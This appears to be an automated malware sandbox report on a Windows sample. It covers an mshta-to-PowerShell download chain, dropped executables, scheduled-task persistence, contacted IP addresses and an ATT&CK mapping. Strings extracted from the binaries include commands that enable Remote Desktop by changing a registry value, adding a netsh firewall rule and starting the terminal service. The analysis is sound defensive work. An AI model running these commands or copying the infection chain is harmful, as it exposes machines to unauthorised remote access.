NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE, 0000000A.00000003.917256725.0000000004980000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: net start termservice
Source: rapes.exe | String found in binary or memory: net start termservice
Source: rapes.exe, 0000000B.00000002.984343955.0000000000EF1000.00000040.00000001.01000000.0000000F.sdmp | String found in binary or memory: net start termservice
Source: rapes.exe, 0000000B.00000003.944161956.0000000005700000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: net start termservice
Source: rapes.exe | String found in binary or memory: net start termservice
Source: rapes.exe, 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: net start termservice
Source: rapes.exe, 0000000C.00000002.989946070.0000000000EF1000.00000040.00000001.01000000.0000000F.sdmp | String found in binary or memory: net start termservice
                  Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE String found in binary or memory: net start termservice
                  Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE, 0000000D.00000002.1002520694.0000000000171000.00000040.00000001.01000000.0000000B.sdmp String found in binary or memory: net start termservice
                  Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE, 0000000D.00000002.1002520694.0000000000171000.00000040.00000001.01000000.0000000B.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set [encoded string table omitted] ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                  Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE, 0000000D.00000003.961859847.0000000005090000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: net start termservice
                  Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE, 0000000D.00000003.961859847.0000000005090000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set [encoded string table omitted] ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                  Source: rapes.exe String found in binary or memory: net start termservice
                  Source: rapes.exe, 00000016.00000003.1491050871.0000000004D70000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: net start termservice
                  Source: rapes.exe, 00000016.00000003.1491050871.0000000004D70000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set [encoded string table omitted] ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                  Source: rapes.exe, 00000016.00000002.2112729465.0000000000EF1000.00000040.00000001.01000000.0000000F.sdmp String found in binary or memory: net start termservice
                  Source: rapes.exe, 00000016.00000002.2112729465.0000000000EF1000.00000040.00000001.01000000.0000000F.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set [encoded string table omitted] ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exe Code function: 0_2_00B21204 socket, WSAGetLastError, bind, WSAGetLastError, closesocket, listen, WSAGetLastError, closesocket (0_2_00B21204)
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exe Code function: 0_2_00B21806 socket, WSAGetLastError, bind, WSAGetLastError, closesocket (0_2_00B21806)
                  MITRE ATT&CK Matrix (digits in parentheses are the signature-count badges shown beside a technique in the original matrix)

                  Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                  Gather Victim Identity Information | Scripting (1) | Valid Accounts (2) | Windows Management Instrumentation (1) | Scripting (1) | Exploitation for Privilege Escalation (1) | Disable or Modify Tools (1) | Input Capture (21) | System Time Discovery (1) | Remote Desktop Protocol (1) | Archive Collected Data (1) | Ingress Tool Transfer (12) | Exfiltration Over Other Network Medium | System Shutdown/Reboot (1)
                  Credentials | Domains | Default Accounts | Native API (1) | DLL Side-Loading (1) | DLL Side-Loading (1) | Deobfuscate/Decode Files or Information (1) | LSASS Memory | Account Discovery (1) | Remote Desktop Protocol | Email Collection (1) | Encrypted Channel (1) | Exfiltration Over Bluetooth | Network Denial of Service
                  Email Addresses | DNS Server | Domain Accounts | Command and Scripting Interpreter (2) | Valid Accounts (2) | Valid Accounts (2) | Obfuscated Files or Information (3) | Security Account Manager | File and Directory Discovery (2) | SMB/Windows Admin Shares | Input Capture (21) | Non-Application Layer Protocol (2) | Automated Exfiltration | Data Encrypted for Impact
                  Employee Names | Virtual Private Server | Local Accounts | Scheduled Task/Job (11) | Scheduled Task/Job (11) | Access Token Manipulation (21) | Software Packing (12) | NTDS | System Information Discovery (238) | Distributed Component Object Model | Input Capture | Application Layer Protocol (112) | Traffic Duplication | Data Destruction
                  Gather Victim Network Information | Server | Cloud Accounts | PowerShell (2) | Network Logon Script | Process Injection (12) | DLL Side-Loading (1) | LSA Secrets | Security Software Discovery (881) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                  Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | Scheduled Task/Job (11) | Masquerading (1) | Cached Domain Credentials | Virtualization/Sandbox Evasion (361) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                  DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Valid Accounts (2) | DCSync | Process Discovery (3) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                  Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Virtualization/Sandbox Evasion (361) | Proc Filesystem | Application Window Discovery (11) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                  Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | Access Token Manipulation (21) | /etc/passwd and /etc/shadow | System Owner/User Discovery (1) | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                  IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Process Injection (12) | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                  Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | Mshta (1) | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  Behavior Graph ID: 1632960  Sample: uw7A6EF76R.exe  Start date: 09/03/2025  Architecture: WINDOWS  Score: 100
                  Sample-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Antivirus / Scanner detection for submitted sample; 18 other signatures

                  Process tree (each node lists its dropped files, network endpoints and signatures; child processes are nested):
                  • uw7A6EF76R.exe
                    - dropped: C:\Users\user\AppData\Local\...\OPrA2uVEu.hta (HTML)
                    - signatures: Binary is likely a compiled AutoIt script file; Found API chain indicative of sandbox detection; Creates HTA files
                    • mshta.exe
                      - signatures: Suspicious powershell command line found; Tries to download and execute files (via powershell)
                      • powershell.exe
                        - network: 176.113.115.7, 49683, 80 (SELECTELRU, Russian Federation)
                        - dropped: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE (PE32)
                        - signatures: Powershell drops PE file
                        • TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE
                          - dropped: C:\Users\user\AppData\Local\...\rapes.exe (PE32)
                          - signatures: Antivirus detection for dropped file; Detected unpacking (changes PE section rights); Contains functionality to start a terminal service; 6 other signatures
                          • rapes.exe
                            - signatures: Antivirus detection for dropped file; Detected unpacking (changes PE section rights); Contains functionality to start a terminal service; 6 other signatures
                            • conhost.exe
                        • conhost.exe
                    • cmd.exe
                      - signatures: Uses schtasks.exe or at.exe to add and modify task schedules
                      • conhost.exe
                      • schtasks.exe
                  • mshta.exe
                    - signatures: Suspicious powershell command line found; Tries to download and execute files (via powershell)
                    • powershell.exe
                      • TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE
                        - signatures: Contains functionality to start a terminal service; Hides threads from debuggers; Tries to detect sandboxes / dynamic malware analysis system (registry check); Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                      • conhost.exe
                  • rapes.exe
                    - network: 176.113.115.6, 49696, 49697, 49698 (SELECTELRU, Russian Federation)
                    - signatures: Contains functionality to start a terminal service; Hides threads from debuggers; Tries to detect sandboxes / dynamic malware analysis system (registry check)
                  • 2 other processes
                    - network: 127.0.0.1 (unknown)
                    - signatures: Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.